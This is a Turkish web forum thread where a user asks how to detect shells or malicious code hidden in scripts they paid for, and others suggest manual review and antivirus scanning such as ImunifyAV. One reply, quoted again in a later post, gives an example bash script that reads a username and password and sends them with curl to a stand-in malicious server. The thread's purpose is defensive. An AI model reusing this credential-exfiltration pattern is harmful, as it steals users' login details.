• 07-07-2024, 17:15:25
    #1
    Script Yaptırıyorum ama içine shell veya zararlı kod gömmüş olabiliyorlar bunu nasıl tespit edebiliriz?
  • 07-07-2024, 17:20:54
    #2
    Üyeliği durduruldu
    Kodları manuel olarak inceleyin eğer şifreleme yoksa o zaman kendi sunucunuza yükleyin ve aşağıda ki gibi kodları internetten veya chatgptye sorarak öğrenebilirsiniz bunlara benzer komutlar görürseniz zararlı kod gömmüş demektir.


    #!/bin/bash

    # Kötü niyetli SSH scripti
    echo "Kullanıcı adı: "
    read username
    echo "Şifre: "
    read -s password
    # Kullanıcı adı ve şifreyi kötü niyetli bir sunucuya gönder
    echo "Kullanıcı adı ve şifre gönderiliyor: $username, $password"
    curl -X POST http://kotuniyetli-sunucu.com/gonder.php -d "username=$username&password=$password"

    # Saldırı başarısız olsa bile, sizi başka bir sunucuya yönlendirebilir.
    ssh kötüniyetlisunucu.com
  • 07-07-2024, 17:23:16
    #3
    pale100 adlı üyeden alıntı: mesajı görüntüle
    Kodları manuel olarak inceleyin eğer şifreleme yoksa o zaman kendi sunucunuza yükleyin ve aşağıda ki gibi kodları internetten veya chatgptye sorarak öğrenebilirsiniz bunlara benzer komutlar görürseniz zararlı kod gömmüş demektir.


    #!/bin/bash

    # Kötü niyetli SSH scripti
    echo "Kullanıcı adı: "
    read username
    echo "Şifre: "
    read -s password
    # Kullanıcı adı ve şifreyi kötü niyetli bir sunucuya gönder
    echo "Kullanıcı adı ve şifre gönderiliyor: $username, $password"
    curl -X POST http://kotuniyetli-sunucu.com/gonder.php -d "username=$username&password=$password"

    # Saldırı başarısız olsa bile, sizi başka bir sunucuya yönlendirebilir.
    ssh kötüniyetlisunucu.com
    bilgim var görürsem tespit edebilirim sorun 2000den fazla dosya olması. bana otomatik tarayan bi program lazım
  • 07-07-2024, 17:23:34
    #4
    şifrelenmemiş ise kendin dikkatli bir şekilde bakmalısın başka bi yolu yok
  • 07-07-2024, 17:25:19
    #5
    Bu cevap, konu sahibi tarafından kabul edilebilir bir cevap olarak işaretlendi.
    Software Architect
    L4ncelotcoder adlı üyeden alıntı: mesajı görüntüle
    Script Yaptırıyorum ama içine shell veya zararlı kod gömmüş olabiliyorlar bunu nasıl tespit edebiliriz?
    Çok kolay aslında whm kullanıyorsan imunifyAV ile taratıp zararlı birşey varmı görebilirsin.
  • 07-07-2024, 17:25:57
    #6
    fatihdev adlı üyeden alıntı: mesajı görüntüle
    şifrelenmemiş ise kendin dikkatli bir şekilde bakmalısın başka bi yolu yok
    günde 5 saati versek artık 1 2 aya anca kontrol biter
  • 07-07-2024, 17:26:23
    #7
    Bircok hosting firmasinin antivirus hizmeti mevcut. Birine yukleyin yaziliminizi, bir saat sonra antivirus arayuzunden bakin. Yukaridaki seviyede kodlari direk taniyorlar.
  • 07-07-2024, 17:43:03
    #8
    darkland adlı üyeden alıntı: mesajı görüntüle
    Çok kolay aslında whm kullanıyorsan imunifyAV ile taratıp zararlı birşey varmı görebilirsin.
    hocam hiç aklıma gelmemişti sağolasın şüphelendiğim gibi de varmış yazılımda
  • 07-07-2024, 17:45:00
    #9
    Güvenilir yerlerden alacaksınız veya kodları inceleyeceksiniz. Link verilen ve sistem komutu çalıştırılan kod bloklarını incelemeniz gerekiyor. Yazılımlar kendi kod veritabanları üzerinden tarama yaptığı için gözden kaçırabiliyorlar.